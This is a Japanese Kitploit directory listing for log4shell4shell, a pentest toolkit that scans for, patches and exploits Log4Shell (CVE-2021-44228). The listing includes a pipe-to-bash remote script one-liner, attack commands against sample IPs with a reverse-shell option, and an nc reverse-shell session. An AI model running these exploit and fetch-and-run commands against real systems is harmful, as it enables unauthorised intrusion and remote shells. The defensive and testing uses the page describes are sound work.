Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
log4shell4shell — Log4shell - マルチツールキット。CVE-2021-44228 の可能性のある脆弱性を発見・修正・テスト - シェル上で完全な LOG4SHELL テスト/攻撃環境を提供します | Kitploit
ツール/GitHubGitHub/suuhm/log4shell4shell
脆弱性スキャナーペイロード生成エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubsuuhm/log4shell4shell

log4shell4shell

Log4shell - マルチツールキット。CVE-2021-44228 の可能性のある脆弱性を発見・修正・テスト - シェル上で完全な LOG4SHELL テスト/攻撃環境を提供します

リポジトリを見る
5104年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

log4shell4shell

Log4j - マルチツール。CVE-2021-44228の潜在的な脆弱性を発見・修正 - 完全なLOG4SHELLテスト/攻撃環境を提供します

Thumb

機能

  • Linux/Mac/BSDおよびWindowsシステムのCVE-2021-44228の脆弱性をチェック
  • log4jのJavaクラスを削除するか、いくつかの環境変数を設定してシステムを修正
  • Proof of Concept: ダミーのSpring Bootサーバーを実行して、自分でエクスプロイトをテストできます (https://github.com/christophetd/log4shell-vulnerable-app)
  • 任意のIP:ポートに対して攻撃を実行し、Base64コマンドまたはシンプルなリバースシェルを含めることができます
  • https://github.com/fullhunt/log4j-scan による完全なIPレンジスキャン

Linux/Mac/BSDでの実行方法:

要件:

  • https://docs.docker.com/get-docker/
  • Debian / Ubuntu: apt update ; apt install default-jre screen python3-pip bash curl
  • OpenSuse: zypper ref ; zypper in default-jre screen python3-pip bash curl
  • Redhead-Linux / CentOS: yum clean; yum install default-jre screen python3-pip bash curl
  • BSD pkg: pkg install default-jre screen python3-pip curl
  • Mac OS (Brew): /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" ; brew install default-jre screen python3 pip

このワンライナーでシステムをクイックチェック:

wget https://raw.githubusercontent.com/suuhm/log4shell4shell/main/log4shell4shell.sh -qO- | bash -s -- --check-system

その他のオプション

IP: 10.4.4.20 ポート8080のログインページに対するサンプル攻撃と、リバースプロキシシェルを実行:

git clone https://github.com/suuhm/log4shell4shell ; cd log4shell4shell
mv log4shell4shell.sh l4s4s.sh && chmod +x l4s4s.sh
./l4s4s.sh --run-attack http://10.4.4.20:8080/login.php -e

screen -r l4s4s-ldap-srv または screen -r l4s4s-nc-rsh を実行して、Exploit-Serverシェルで攻撃情報の一部を表示します:

IP: 10.4.4.20 ポート8080の完全スキャンと、全テストの試行を実行:

./l4s4s.sh --python-scan "-u 10.4.4.20:8080 --run-all-tests"

Tomcat Spring BootサーバーでProof of Conceptを実行:

./l4s4s.sh --run-dummy-server && \
./l4s4s.sh --run-attack http://127.0.0.1:4280 -e

Unifi-Controllerのエクスプロイト攻撃/チェックを実行 (10.4.4.20:8443):

./l4s4s.sh --run-attack 10.4.4.20:8443 -e --unifi-post

利用可能な全オプション

_|                            _|  _|              _|                  _|  _|  _|  _|              _|                  _|  _|
_|          _|_|      _|_|_|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|  _|  _|      _|_|_|  _|_|_|      _|_|    _|  _|
_|        _|    _|  _|    _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|  _|_|_|_|  _|_|      _|    _|  _|_|_|_|  _|  _|
_|        _|    _|  _|    _|      _|        _|_|  _|    _|  _|        _|  _|      _|        _|_|  _|    _|  _|        _|  _|
_|_|_|_|    _|_|      _|_|_|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|      _|    _|_|_|    _|    _|    _|_|_|  _|  _|
                          _|
                      _|_|


 > Running Log4shell Framework & Check-Toolkit on shell v0.1a (C) 2021 suuhm

Wrong input! Please enter one of these options:

Usage: ./l4s4s.sh [OPTIONS] <IP:PORT|COMMAND>

                        --get-powershell-finder
                        --check-system
                        --fix-log4j
                        --run-dummy-server <JNDIExploit.*.zip>
                        --run-attack <FORMAT: IP:PORT> <-e/-t/'cmd'> [--unifi-post]
                        --python-scan <command>

LinuxやmacOSのPythonバージョンをアップグレードする方法:

ヘルパースクリプト(--list-versions)を実行するだけです: ./python-upgrader.sh

Windows x86 / x64での実行方法:

Powershell(管理者モード)で実行するだけです: .\set_windows_fix.ps1

このスクリプトはアルファ版です!問題があればお知らせください

法的免責事項

log4shell4shellプロジェクトは、教育および倫理的なテストの目的のみで作成されています。事前の相互同意なしに対象を攻撃するためのlog4j-scanの使用は違法です。適用されるすべての地域、州、連邦の法律を遵守する責任はエンドユーザーにあります。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害についても責任を負いません。

ツールをダウンロード